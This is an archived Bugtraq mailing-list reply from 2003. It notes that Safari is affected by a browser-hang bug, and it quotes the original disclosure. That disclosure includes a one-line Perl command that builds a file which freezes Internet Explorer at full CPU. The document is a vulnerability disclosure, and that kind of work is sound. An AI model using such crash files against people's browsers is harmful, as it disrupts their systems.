Bugtraq: Re: April appeared to be a month of IE bugs. Here's another one.

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: April appeared to be a month of IE bugs. Here's another one.

From: Cove Schneider <cove () wildpackets com>
Date: Tue, 29 Apr 2003 12:59:21 -0700

Apple's Safari browser appears to be effected too....

Safari 1.0 Beta 2 (v73)

PID COMMAND %CPU TIME #TH #PRTS #MREGS RPRVT RSHRD RSIZEVSIZE3249 Safari 94.2% 0:07.20 4 108 288 5.40M 23.1M 14.7M130M


On Tuesday, April 29, 2003, at 11:23 AM, ERRor wrote:

Hello, Bugtraq.

Malicious htm file can freeze IE with 100% CPU usage:
Construct the file freeze.htm:
c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
After opening freeze.htm IE will hang with 100% CPU usage untilIEXPLORE.EXEprocess is not killed. Two bytes (0xff 0xfe) at the beginning of thefile
mean that
the encoding is unicode. So the internal unicode representation of theCR LF
sequence
will look like 0D0A0D0A but not 000D000A (if the file was a plainASCII).Tested on IE 6.0 with all fixes, i think other versions alsovulnerable.
Best Regards, ERRor, dHtm.
P.S. greets to .einstein. and dHtm

By Date By Thread

Current thread:

Re: April appeared to be a month of IE bugs. Here's another one. ERRor (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. mbergson <Joachim.Strombergson () InformAsic com> (May 02)
- <Possible follow-ups>
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)